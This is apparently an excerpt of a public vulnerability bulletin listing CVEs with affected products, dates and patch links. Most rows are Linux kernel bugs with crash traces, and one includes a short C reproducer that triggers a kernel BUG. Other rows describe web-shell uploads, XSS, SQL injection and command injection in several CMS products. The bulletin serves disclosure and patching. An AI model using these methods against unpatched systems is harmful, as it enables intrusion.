| not yet calculated | CVE-2023-53859 | https://git.kernel.org/stable/c/49aa49952116b8fd56bfb1e8c69bce179f49bece https://git.kernel.org/stable/c/611c390217106c46e24e1af3db83187339d447ea https://git.kernel.org/stable/c/fc60c4f12d8a056f20d8f4d0086a36c68ffa9fdc https://git.kernel.org/stable/c/a9cbc1b471d291c865907542394f1c483b93a811 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: don't attempt to queue IO under RCU protection dm looks up the table for IO based on the request type, with an assumption that if the request is marked REQ_NOWAIT, it's fine to attempt to submit that IO while under RCU read lock protection. This is not OK, as REQ_NOWAIT just means that we should not be sleeping waiting on other IO, it does not mean that we can't potentially schedule. A simple test case demonstrates this quite nicely: int main(int argc, char *argv[]) { struct iovec iov; int fd; fd = open("/dev/dm-0", O_RDONLY | O_DIRECT); posix_memalign(&iov.iov_base, 4096, 4096); iov.iov_len = 4096; preadv2(fd, &iov, 1, 0, RWF_NOWAIT); return 0; } which will instantly spew: BUG: sleeping function called from invalid context at include/linux/sched/mm.h:306 in_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 5580, name: dm-nowait preempt_count: 0, expected: 0 RCU nest depth: 1, expected: 0 INFO: lockdep is turned off. CPU: 7 PID: 5580 Comm: dm-nowait Not tainted 6.6.0-rc1-g39956d2dcd81 #132 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x11d/0x1b0 __might_resched+0x3c3/0x5e0 ? preempt_count_sub+0x150/0x150 mempool_alloc+0x1e2/0x390 ? mempool_resize+0x7d0/0x7d0 ? lock_sync+0x190/0x190 ? lock_release+0x4b7/0x670 ? internal_get_user_pages_fast+0x868/0x2d40 bio_alloc_bioset+0x417/0x8c0 ? bvec_alloc+0x200/0x200 ? internal_get_user_pages_fast+0xb8c/0x2d40 bio_alloc_clone+0x53/0x100 dm_submit_bio+0x27f/0x1a20 ? lock_release+0x4b7/0x670 ? blk_try_enter_queue+0x1a0/0x4d0 ? dm_dax_direct_access+0x260/0x260 ? rcu_is_watching+0x12/0xb0 ? blk_try_enter_queue+0x1cc/0x4d0 __submit_bio+0x239/0x310 ? __bio_queue_enter+0x700/0x700 ? kvm_clock_get_cycles+0x40/0x60 ? ktime_get+0x285/0x470 submit_bio_noacct_nocheck+0x4d9/0xb80 ? should_fail_request+0x80/0x80 ? preempt_count_sub+0x150/0x150 ? lock_release+0x4b7/0x670 ? __bio_add_page+0x143/0x2d0 ? iov_iter_revert+0x27/0x360 submit_bio_noacct+0x53e/0x1b30 submit_bio_wait+0x10a/0x230 ? submit_bio_wait_endio+0x40/0x40 __blkdev_direct_IO_simple+0x4f8/0x780 ? blkdev_bio_end_io+0x4c0/0x4c0 ? stack_trace_save+0x90/0xc0 ? __bio_clone+0x3c0/0x3c0 ? lock_release+0x4b7/0x670 ? lock_sync+0x190/0x190 ? atime_needs_update+0x3bf/0x7e0 ? timestamp_truncate+0x21b/0x2d0 ? inode_owner_or_capable+0x240/0x240 blkdev_direct_IO.part.0+0x84a/0x1810 ? rcu_is_watching+0x12/0xb0 ? lock_release+0x4b7/0x670 ? blkdev_read_iter+0x40d/0x530 ? reacquire_held_locks+0x4e0/0x4e0 ? __blkdev_direct_IO_simple+0x780/0x780 ? rcu_is_watching+0x12/0xb0 ? __mark_inode_dirty+0x297/0xd50 ? preempt_count_add+0x72/0x140 blkdev_read_iter+0x2a4/0x530 do_iter_readv_writev+0x2f2/0x3c0 ? generic_copy_file_range+0x1d0/0x1d0 ? fsnotify_perm.part.0+0x25d/0x630 ? security_file_permission+0xd8/0x100 do_iter_read+0x31b/0x880 ? import_iovec+0x10b/0x140 vfs_readv+0x12d/0x1a0 ? vfs_iter_read+0xb0/0xb0 ? rcu_is_watching+0x12/0xb0 ? rcu_is_watching+0x12/0xb0 ? lock_release+0x4b7/0x670 do_preadv+0x1b3/0x260 ? do_readv+0x370/0x370 __x64_sys_preadv2+0xef/0x150 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f5af41ad806 Code: 41 54 41 89 fc 55 44 89 c5 53 48 89 cb 48 83 ec 18 80 3d e4 dd 0d 00 00 74 7a 45 89 c1 49 89 ca 45 31 c0 b8 47 01 00 00 0f 05 <48> 3d 00 f0 ff ff 0f 87 be 00 00 00 48 85 c0 79 4a 48 8b 0d da 55 RSP: 002b:00007ffd3145c7f0 EFLAGS: 00000246 ORIG_RAX: 0000000000000147 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5af41ad806 RDX: 0000000000000001 RSI: 00007ffd3145c850 RDI: 0000000000000003 RBP: 0000000000000008 R08: 0000000000000000 R09: 0000000000000008 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000003 R13: 00007ffd3145c850 R14: 000055f5f0431dd8 R15: 0000000000000001 </TASK> where in fact it is ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53860 | https://git.kernel.org/stable/c/d7b2abd87d1fcdb47811f90090a363e7ca15cb14 https://git.kernel.org/stable/c/699775e9338adcd4eaedea000d32c60250c3114d https://git.kernel.org/stable/c/a9ce385344f916cd1c36a33905e564f5581beae9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: correct grp validation in ext4_mb_good_group The group corruption check will access memory of grp and will trigger a kernel crash if grp is NULL. So do a NULL check before the corruption check. | 2025-12-09 | not yet calculated | CVE-2023-53861 | https://git.kernel.org/stable/c/245759d987b617d183061db6ab8886ebb5cc78e9 https://git.kernel.org/stable/c/3e24082f16825279054a2b8a5e668d65070bbf07 https://git.kernel.org/stable/c/772ca4bc1d0d21320ef2ecc0f9e4f90ea85a035d https://git.kernel.org/stable/c/83a9d5f5ec7e75640b1ba0bbd77a4888df798bb4 https://git.kernel.org/stable/c/e69d665987db0e37896adf78a7e718f9a0a75d3f https://git.kernel.org/stable/c/a9ce5993a0f5c0887c8a1b4ffa3b8046fbcfdc93 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: fix missing hfs_bnode_get() in __hfs_bnode_create Syzbot found a kernel BUG in hfs_bnode_put(): kernel BUG at fs/hfs/bnode.c:466! invalid opcode: 0000 [#1] PREEMPT SMP KASAN CPU: 0 PID: 3634 Comm: kworker/u4:5 Not tainted 6.1.0-rc7-syzkaller-00190-g97ee9d1c1696 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/26/2022 Workqueue: writeback wb_workfn (flush-7:0) RIP: 0010:hfs_bnode_put+0x46f/0x480 fs/hfs/bnode.c:466 Code: 8a 80 ff e9 73 fe ff ff 89 d9 80 e1 07 80 c1 03 38 c1 0f 8c a0 fe ff ff 48 89 df e8 db 8a 80 ff e9 93 fe ff ff e8 a1 68 2c ff <0f> 0b e8 9a 68 2c ff 0f 0b 0f 1f 84 00 00 00 00 00 55 41 57 41 56 RSP: 0018:ffffc90003b4f258 EFLAGS: 00010293 RAX: ffffffff825e318f RBX: 0000000000000000 RCX: ffff8880739dd7c0 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc90003b4f430 R08: ffffffff825e2d9b R09: ffffed10045157d1 R10: ffffed10045157d1 R11: 1ffff110045157d0 R12: ffff8880228abe80 R13: ffff88807016c000 R14: dffffc0000000000 R15: ffff8880228abe00 FS: 0000000000000000(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa6ebe88718 CR3: 000000001e93d000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> hfs_write_inode+0x1bc/0xb40 write_inode fs/fs-writeback.c:1440 [inline] __writeback_single_inode+0x4d6/0x670 fs/fs-writeback.c:1652 writeback_sb_inodes+0xb3b/0x18f0 fs/fs-writeback.c:1878 __writeback_inodes_wb+0x125/0x420 fs/fs-writeback.c:1949 wb_writeback+0x440/0x7b0 fs/fs-writeback.c:2054 wb_check_start_all fs/fs-writeback.c:2176 [inline] wb_do_writeback fs/fs-writeback.c:2202 [inline] wb_workfn+0x827/0xef0 fs/fs-writeback.c:2235 process_one_work+0x877/0xdb0 kernel/workqueue.c:2289 worker_thread+0xb14/0x1330 kernel/workqueue.c:2436 kthread+0x266/0x300 kernel/kthread.c:376 ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306 </TASK> The BUG_ON() is triggered here: /* Dispose of resources used by a node */ void hfs_bnode_put(struct hfs_bnode *node) { if (node) { <skipped> BUG_ON(!atomic_read(&node->refcnt)); <- we have the issue here! <skipped> } } By tracing the refcnt, I found the node is created by hfs_bmap_alloc() with refcnt 1. Then the node is used by hfs_btree_write(). There is a missing hfs_bnode_get() after finding the node. The issue happened in the following path: <alloc> hfs_bmap_alloc hfs_bnode_find __hfs_bnode_create <- allocate a new node with refcnt 1. hfs_bnode_put <- decrease the refcnt <write> hfs_btree_write hfs_bnode_find __hfs_bnode_create hfs_bnode_findhash <- find the node without refcnt increased. hfs_bnode_put <- trigger the BUG_ON() since refcnt is 0. | 2025-12-09 | not yet calculated | CVE-2023-53862 | https://git.kernel.org/stable/c/062af3e9930762d1fd22946748d34e0d859e4a8e https://git.kernel.org/stable/c/3a9065a33988c02789722be612f7c42fb8ebbb22 https://git.kernel.org/stable/c/eda6879272e4df5456afc36642052ea066f58410 https://git.kernel.org/stable/c/dc9f78b6d254427a06e568f2887b1011ef3143ef https://git.kernel.org/stable/c/2cab8db14566cf6a516c1f103a60cf6b7f54b1e5 https://git.kernel.org/stable/c/8140cdc57bc5844cd5e1392673ec2dbf8fdc6940 https://git.kernel.org/stable/c/38d72e6604b9f96dffcc0565090cc01622a37b2a https://git.kernel.org/stable/c/a9dc087fd3c484fd1ed18c5efb290efaaf44ce03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netlink: do not hard code device address length in fdb dumps syzbot reports that some netdev devices do not have a six-byte address [1] Replace ETH_ALEN by dev->addr_len. [1] (Case of a device where dev->addr_len = 4) BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline] BUG: KMSAN: kernel-infoleak in copyout+0xb8/0x100 lib/iov_iter.c:169 instrument_copy_to_user include/linux/instrumented.h:114 [inline] copyout+0xb8/0x100 lib/iov_iter.c:169 _copy_to_iter+0x6d8/0x1d00 lib/iov_iter.c:536 copy_to_iter include/linux/uio.h:206 [inline] simple_copy_to_iter+0x68/0xa0 net/core/datagram.c:513 __skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419 skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:527 skb_copy_datagram_msg include/linux/skbuff.h:3960 [inline] netlink_recvmsg+0x4ae/0x15a0 net/netlink/af_netlink.c:1970 sock_recvmsg_nosec net/socket.c:1019 [inline] sock_recvmsg net/socket.c:1040 [inline] ____sys_recvmsg+0x283/0x7f0 net/socket.c:2722 ___sys_recvmsg+0x223/0x840 net/socket.c:2764 do_recvmmsg+0x4f9/0xfd0 net/socket.c:2858 __sys_recvmmsg net/socket.c:2937 [inline] __do_sys_recvmmsg net/socket.c:2960 [inline] __se_sys_recvmmsg net/socket.c:2953 [inline] __x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was stored to memory at: __nla_put lib/nlattr.c:1009 [inline] nla_put+0x1c6/0x230 lib/nlattr.c:1067 nlmsg_populate_fdb_fill+0x2b8/0x600 net/core/rtnetlink.c:4071 nlmsg_populate_fdb net/core/rtnetlink.c:4418 [inline] ndo_dflt_fdb_dump+0x616/0x840 net/core/rtnetlink.c:4456 rtnl_fdb_dump+0x14ff/0x1fc0 net/core/rtnetlink.c:4629 netlink_dump+0x9d1/0x1310 net/netlink/af_netlink.c:2268 netlink_recvmsg+0xc5c/0x15a0 net/netlink/af_netlink.c:1995 sock_recvmsg_nosec+0x7a/0x120 net/socket.c:1019 ____sys_recvmsg+0x664/0x7f0 net/socket.c:2720 ___sys_recvmsg+0x223/0x840 net/socket.c:2764 do_recvmmsg+0x4f9/0xfd0 net/socket.c:2858 __sys_recvmmsg net/socket.c:2937 [inline] __do_sys_recvmmsg net/socket.c:2960 [inline] __se_sys_recvmmsg net/socket.c:2953 [inline] __x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was created at: slab_post_alloc_hook+0x12d/0xb60 mm/slab.h:716 slab_alloc_node mm/slub.c:3451 [inline] __kmem_cache_alloc_node+0x4ff/0x8b0 mm/slub.c:3490 kmalloc_trace+0x51/0x200 mm/slab_common.c:1057 kmalloc include/linux/slab.h:559 [inline] __hw_addr_create net/core/dev_addr_lists.c:60 [inline] __hw_addr_add_ex+0x2e5/0x9e0 net/core/dev_addr_lists.c:118 __dev_mc_add net/core/dev_addr_lists.c:867 [inline] dev_mc_add+0x9a/0x130 net/core/dev_addr_lists.c:885 igmp6_group_added+0x267/0xbc0 net/ipv6/mcast.c:680 ipv6_mc_up+0x296/0x3b0 net/ipv6/mcast.c:2754 ipv6_mc_remap+0x1e/0x30 net/ipv6/mcast.c:2708 addrconf_type_change net/ipv6/addrconf.c:3731 [inline] addrconf_notify+0x4d3/0x1d90 net/ipv6/addrconf.c:3699 notifier_call_chain kernel/notifier.c:93 [inline] raw_notifier_call_chain+0xe4/0x430 kernel/notifier.c:461 call_netdevice_notifiers_info net/core/dev.c:1935 [inline] call_netdevice_notifiers_extack net/core/dev.c:1973 [inline] call_netdevice_notifiers+0x1ee/0x2d0 net/core/dev.c:1987 bond_enslave+0xccd/0x53f0 drivers/net/bonding/bond_main.c:1906 do_set_master net/core/rtnetlink.c:2626 [inline] rtnl_newlink_create net/core/rtnetlink.c:3460 [inline] __rtnl_newlink net/core/rtnetlink.c:3660 [inline] rtnl_newlink+0x378c/0x40e0 net/core/rtnetlink.c:3673 rtnetlink_rcv_msg+0x16a6/0x1840 net/core/rtnetlink.c:6395 netlink_rcv_skb+0x371/0x650 net/netlink/af_netlink.c:2546 rtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6413 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0xf28/0x1230 net/netlink/af_ ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53863 | https://git.kernel.org/stable/c/61d1bf3c34bf5fe936c50d1a4bc460babcc85e88 https://git.kernel.org/stable/c/c3ad49ff5c030cbe719fc4cb0ae081b8255ef4b3 https://git.kernel.org/stable/c/bd1de6107f10e7d4c2aabe3397b58d63672fc511 https://git.kernel.org/stable/c/44db85c6e1a184b99a2cdf56b525ac63c4962c22 https://git.kernel.org/stable/c/619384319b137908d1008c92426c9daa95c06b90 https://git.kernel.org/stable/c/e9331c8fa4c69f09d2c71682af75586f77266e81 https://git.kernel.org/stable/c/b6f2d4618fc697886ad41e215ae20638153e42d0 https://git.kernel.org/stable/c/73862118bd9dec850aa8e775145647ddd23aedf8 https://git.kernel.org/stable/c/aa5406950726e336c5c9585b09799a734b6e77bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/mxsfb: Disable overlay plane in mxsfb_plane_overlay_atomic_disable() When disabling the overlay plane in mxsfb_plane_overlay_atomic_update(), the overlay plane's framebuffer pointer is NULL. So, dereferencing it would cause a kernel Oops (NULL pointer dereference). Fix the issue by disabling the overlay plane in mxsfb_plane_overlay_atomic_disable() instead. | 2025-12-09 | not yet calculated | CVE-2023-53864 | https://git.kernel.org/stable/c/8bf2d4ca521d3acb57fc1607386e749b3cc92aaf https://git.kernel.org/stable/c/0f98de0a11d29821d9448114178ddc1b1fe32a18 https://git.kernel.org/stable/c/aa656d48e871a1b062e1bbf9474d8b831c35074c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix warning when putting transaction with qgroups enabled after abort If we have a transaction abort with qgroups enabled we get a warning triggered when doing the final put on the transaction, like this: [552.6789] ------------[ cut here ]------------ [552.6815] WARNING: CPU: 4 PID: 81745 at fs/btrfs/transaction.c:144 btrfs_put_transaction+0x123/0x130 [btrfs] [552.6817] Modules linked in: btrfs blake2b_generic xor (...) [552.6819] CPU: 4 PID: 81745 Comm: btrfs-transacti Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1 [552.6819] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [552.6819] RIP: 0010:btrfs_put_transaction+0x123/0x130 [btrfs] [552.6821] Code: bd a0 01 00 (...) [552.6821] RSP: 0018:ffffa168c0527e28 EFLAGS: 00010286 [552.6821] RAX: ffff936042caed00 RBX: ffff93604a3eb448 RCX: 0000000000000000 [552.6821] RDX: ffff93606421b028 RSI: ffffffff92ff0878 RDI: ffff93606421b010 [552.6821] RBP: ffff93606421b000 R08: 0000000000000000 R09: ffffa168c0d07c20 [552.6821] R10: 0000000000000000 R11: ffff93608dc52950 R12: ffffa168c0527e70 [552.6821] R13: ffff93606421b000 R14: ffff93604a3eb420 R15: ffff93606421b028 [552.6821] FS: 0000000000000000(0000) GS:ffff93675fb00000(0000) knlGS:0000000000000000 [552.6821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [552.6821] CR2: 0000558ad262b000 CR3: 000000014feda005 CR4: 0000000000370ee0 [552.6822] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [552.6822] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [552.6822] Call Trace: [552.6822] <TASK> [552.6822] ? __warn+0x80/0x130 [552.6822] ? btrfs_put_transaction+0x123/0x130 [btrfs] [552.6824] ? report_bug+0x1f4/0x200 [552.6824] ? handle_bug+0x42/0x70 [552.6824] ? exc_invalid_op+0x14/0x70 [552.6824] ? asm_exc_invalid_op+0x16/0x20 [552.6824] ? btrfs_put_transaction+0x123/0x130 [btrfs] [552.6826] btrfs_cleanup_transaction+0xe7/0x5e0 [btrfs] [552.6828] ? _raw_spin_unlock_irqrestore+0x23/0x40 [552.6828] ? try_to_wake_up+0x94/0x5e0 [552.6828] ? __pfx_process_timeout+0x10/0x10 [552.6828] transaction_kthread+0x103/0x1d0 [btrfs] [552.6830] ? __pfx_transaction_kthread+0x10/0x10 [btrfs] [552.6832] kthread+0xee/0x120 [552.6832] ? __pfx_kthread+0x10/0x10 [552.6832] ret_from_fork+0x29/0x50 [552.6832] </TASK> [552.6832] ---[ end trace 0000000000000000 ]--- This corresponds to this line of code: void btrfs_put_transaction(struct btrfs_transaction *transaction) { (...) WARN_ON(!RB_EMPTY_ROOT( &transaction->delayed_refs.dirty_extent_root)); (...) } The warning happens because in btrfs_qgroup_destroy_extent_records(), called in the transaction abort path, we free all entries from the rbtree "dirty_extent_root" with rbtree_postorder_for_each_entry_safe(), but we don't actually empty the rbtree - it's still pointing to nodes that were freed. So set the rbtree's root node to NULL to avoid this warning (assign RB_ROOT). | 2025-12-09 | not yet calculated | CVE-2023-53865 | https://git.kernel.org/stable/c/ae91ab710d8e309f6c9eba07ce0d9d0b5d9040f0 https://git.kernel.org/stable/c/d2c667cc18314c9bad3ec86ae071c0342132aa09 https://git.kernel.org/stable/c/c9060caab4135dd660c4676d1ea33a6e0d3fc09d https://git.kernel.org/stable/c/89e994688e965813ec0a09fb30b87fb8cee06474 https://git.kernel.org/stable/c/62dd82bc7a90b5052c062a0ad5be6d8a479a3cfb https://git.kernel.org/stable/c/aa84ce8a78a1a5c10cdf9c7a5fb0c999fbc2c8d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: soc-compress: Reposition and add pcm_mutex If panic_on_warn is set and a compress stream (DPCM) is started, then a kernel panic occurs because card->pcm_mutex isn't held appropriately. In the following functions, warnings were issued at this line "snd_soc_dpcm_mutex_assert_held". static int dpcm_be_connect(struct snd_soc_pcm_runtime *fe, struct snd_soc_pcm_runtime *be, int stream) { ... snd_soc_dpcm_mutex_assert_held(fe); ... } void dpcm_be_disconnect(struct snd_soc_pcm_runtime *fe, int stream) { ... snd_soc_dpcm_mutex_assert_held(fe); ... } void snd_soc_runtime_action(struct snd_soc_pcm_runtime *rtd, int stream, int action) { ... snd_soc_dpcm_mutex_assert_held(rtd); ... } int dpcm_dapm_stream_event(struct snd_soc_pcm_runtime *fe, int dir, int event) { ... snd_soc_dpcm_mutex_assert_held(fe); ... } These functions are called by soc_compr_set_params_fe, soc_compr_open_fe and soc_compr_free_fe without pcm_mutex locking. And this is the call stack. [ 414.527841][ T2179] pc : dpcm_process_paths+0x5a4/0x750 [ 414.527848][ T2179] lr : dpcm_process_paths+0x37c/0x750 [ 414.527945][ T2179] Call trace: [ 414.527949][ T2179] dpcm_process_paths+0x5a4/0x750 [ 414.527955][ T2179] soc_compr_open_fe+0xb0/0x2cc [ 414.527972][ T2179] snd_compr_open+0x180/0x248 [ 414.527981][ T2179] snd_open+0x15c/0x194 [ 414.528003][ T2179] chrdev_open+0x1b0/0x220 [ 414.528023][ T2179] do_dentry_open+0x30c/0x594 [ 414.528045][ T2179] vfs_open+0x34/0x44 [ 414.528053][ T2179] path_openat+0x914/0xb08 [ 414.528062][ T2179] do_filp_open+0xc0/0x170 [ 414.528068][ T2179] do_sys_openat2+0x94/0x18c [ 414.528076][ T2179] __arm64_sys_openat+0x78/0xa4 [ 414.528084][ T2179] invoke_syscall+0x48/0x10c [ 414.528094][ T2179] el0_svc_common+0xbc/0x104 [ 414.528099][ T2179] do_el0_svc+0x34/0xd8 [ 414.528103][ T2179] el0_svc+0x34/0xc4 [ 414.528125][ T2179] el0t_64_sync_handler+0x8c/0xfc [ 414.528133][ T2179] el0t_64_sync+0x1a0/0x1a4 [ 414.528142][ T2179] Kernel panic - not syncing: panic_on_warn set ... So, I reposition and add pcm_mutex to resolve the lockdep error. | 2025-12-09 | not yet calculated | CVE-2023-53866 | https://git.kernel.org/stable/c/9576b7ccc20365d27c26c494651c89360a85bbdc https://git.kernel.org/stable/c/9a9942cbdb7c3f41452f7bc4a9ff9f0b45eb3651 https://git.kernel.org/stable/c/37a3eb6054d17676ce2a0bb5dd1fbf7733ecfa7d https://git.kernel.org/stable/c/aa9ff6a4955fdba02b54fbc4386db876603703b7 |
| TianoCore--EDK2 | EDK2 contains a vulnerability in BIOS where an attacker may cause "Exposure of Sensitive Information to an Unauthorized Actor" by local access. Successful exploitation of this vulnerability will lead to possible information disclosure or escalation of privilege and impact Confidentiality. | 2025-12-09 | not yet calculated | CVE-2024-38798 | https://github.com/tianocore/edk2/security/advisories/GHSA-q2c6-37h5-7cwf |
| apprain--appRain CMF | appRain CMF 4.0.5 contains an authenticated remote code execution vulnerability that allows administrative users to upload malicious PHP files through the filemanager upload endpoint. Attackers can leverage authenticated access to generate a web shell with command execution capabilities by uploading a crafted PHP file to the site's uploads directory. | 2025-12-10 | not yet calculated | CVE-2024-58279 | ExploitDB-52041 Official Vendor Homepage Software Link VulnCheck Advisory: appRain CMF 4.0.5 Authenticated Remote Code Execution via Filemanager Upload |
| CMSimple--CMSimple | CMSimple 5.15 contains a remote command execution vulnerability that allows authenticated attackers to modify file extensions and upload malicious PHP files. Attackers can append ',php' to Extensions_userfiles and upload a shell script to the media directory to execute arbitrary code on the server. | 2025-12-10 | not yet calculated | CVE-2024-58280 | ExploitDB-52040 CMSimple Homepage CMSimple Download Page VulnCheck Advisory: CMSimple 5.15 Remote Command Execution via Extensions Configuration |
| dotclear--Dotclear | Dotclear 2.29 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the media upload functionality. Attackers can exploit the file upload process by crafting a PHP shell with a command execution form to gain system access through the uploaded file. | 2025-12-10 | not yet calculated | CVE-2024-58281 | ExploitDB-52037 Vendor Homepage Software Link VulnCheck Advisory: Dotclear 2.29 Remote Code Execution via Authenticated File Upload |
| Serendipity--Serendipity | Serendipity 2.5.0 contains a remote code execution vulnerability that allows authenticated administrators to upload malicious PHP files through the media upload functionality. Attackers can exploit the file upload mechanism by creating a PHP shell with a command execution form that enables arbitrary system command execution on the web server. | 2025-12-10 | not yet calculated | CVE-2024-58282 | ExploitDB-52036 Vendor Homepage Software Link VulnCheck Advisory: Serendipity 2.5.0 Remote Code Execution via Authenticated Media Upload |
| wbce--WBCE CMS | WBCE CMS version 1.6.2 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the Elfinder file manager. Attackers can exploit the file upload functionality in the elfinder connector to upload a web shell and execute arbitrary system commands through a user-controlled parameter. | 2025-12-10 | not yet calculated | CVE-2024-58283 | ExploitDB-52039 WBCE CMS Homepage WBCE CMS GitHub Repository VulnCheck Advisory: WBCE CMS 1.6.2 Remote Code Execution via Elfinder File Upload |
| PopojiCMS--PopojiCMS | PopojiCMS 2.0.1 contains an authenticated remote command execution vulnerability that allows administrative users to inject malicious PHP code through the metadata settings endpoint. Attackers can log in and modify the meta content to create a web shell that executes arbitrary system commands through a GET parameter. | 2025-12-10 | not yet calculated | CVE-2024-58284 | ExploitDB-52022 Official Vendor Homepage Product Archive Project Repository VulnCheck Advisory: PopojiCMS 2.0.1 Remote Command Execution via Authenticated Metadata Settings |
| chyrp--Chyrp | Chyrp 2.5.2 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into post titles. Attackers can craft payloads in the title field that will execute when the post is viewed by other users, potentially stealing session cookies or performing client-side attacks. | 2025-12-10 | not yet calculated | CVE-2024-58285 | ExploitDB-52013 Chyrp GitHub Repository Chyrp Software Archive VulnCheck Advisory: Chyrp 2.5.2 Stored Cross-Site Scripting Vulnerability via Post Title |
| vexorian--dizqueTV | dizqueTV 1.5.3 contains a remote code execution vulnerability that allows attackers to inject arbitrary commands through the FFMPEG Executable Path settings. Attackers can modify the executable path with shell commands to read system files like /etc/passwd by exploiting improper input validation. | 2025-12-11 | not yet calculated | CVE-2024-58286 | ExploitDB-52079 DizqueTV GitHub Repository VulnCheck Advisory: dizqueTV 1.5.3 Remote Code Execution via FFMPEG Executable Path |
| rengine--reNgine | reNgine 2.2.0 contains a command injection vulnerability in the nmap_cmd parameter of scan engine configuration that allows authenticated attackers to execute arbitrary commands. Attackers can modify the nmap_cmd parameter with malicious base64-encoded payloads to achieve remote code execution during scan engine configuration. | 2025-12-11 | not yet calculated | CVE-2024-58287 | ExploitDB-52081 Rengine Wiki Homepage Rengine GitHub Repository VulnCheck Advisory: reNgine 2.2.0 Authenticated Command Injection via Scan Engine Configuration |
| Genexus--Genexus Protection Server | Genexus Protection Server 9.7.2.10 contains an unquoted service path vulnerability in the protsrvservice Windows service configuration. Attackers can exploit the unquoted binary path to execute arbitrary code with elevated LocalSystem privileges by placing malicious executables in specific file system locations. | 2025-12-11 | not yet calculated | CVE-2024-58288 | ExploitDB-52065 Official Genexus Homepage Genexus Software Download Center VulnCheck Advisory: Genexus Protection Server 9.7.2.10 Unquoted Service Path Privilege Escalation |
| microweber--Microweber | Microweber 2.0.15 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts into user profile fields. Attackers can input script payloads in the first name field that will execute when the profile is viewed by other users, potentially stealing session cookies and executing arbitrary JavaScript. | 2025-12-11 | not yet calculated | CVE-2024-58289 | ExploitDB-52058 Microweber Homepage Microweber GitHub Repository VulnCheck Advisory: Microweber 2.0.15 Stored Cross-Site Scripting via User Profile Fields |
| Elements--Xhibiter NFT Marketplace | Xhibiter NFT Marketplace 1.10.2 contains a SQL injection vulnerability in the collections endpoint that allows attackers to manipulate database queries through the 'id' parameter. Attackers can exploit boolean-based, time-based, and UNION-based SQL injection techniques to potentially extract or manipulate database information by sending crafted payloads to the collections page. | 2025-12-11 | not yet calculated | CVE-2024-58290 | ExploitDB-52060 Official Vendor Homepage VulnCheck Advisory: Xhibiter NFT Marketplace 1.10.2 SQL Injection via Collections Endpoint |
| Flatboard--Flatboard | Flatboard 3.2 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts in forum information fields. Attackers can insert JavaScript payloads that execute when other users view the forum, potentially stealing session cookies and executing client-side scripts. | 2025-12-11 | not yet calculated | CVE-2024-58291 | ExploitDB-52054 Flatboard Homepage Flatboard Support Page VulnCheck Advisory: Flatboard 3.2 Authenticated Stored Cross-Site Scripting via Forum Information Field |
| xmbforum2--XMB Forum | XMB Forum 1.9.12.06 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious JavaScript into templates and front page settings. Attackers can insert XSS payloads in footer templates and news ticker fields, enabling script execution for all forum users when pages are rendered. | 2025-12-11 | not yet calculated | CVE-2024-58292 | ExploitDB-52044 XMB Forum Homepage VulnCheck Advisory: XMB Forum 1.9.12.06 Persistent Cross-Site Scripting via Admin Templates |
| Akaunting--Akaunting | Akaunting 3.1.8 contains a server-side template injection vulnerability that allows authenticated administrators to execute template expressions in multiple form input fields. Attackers can inject template payloads in items, taxes, transactions, and vendor name fields to perform arithmetic operations and string manipulations. | 2025-12-11 | not yet calculated | CVE-2024-58293 | ExploitDB-52030 Vendor Homepage Software Link VulnCheck Advisory: Akaunting 3.1.8 Server-Side Template Injection via Multiple Form Fields |
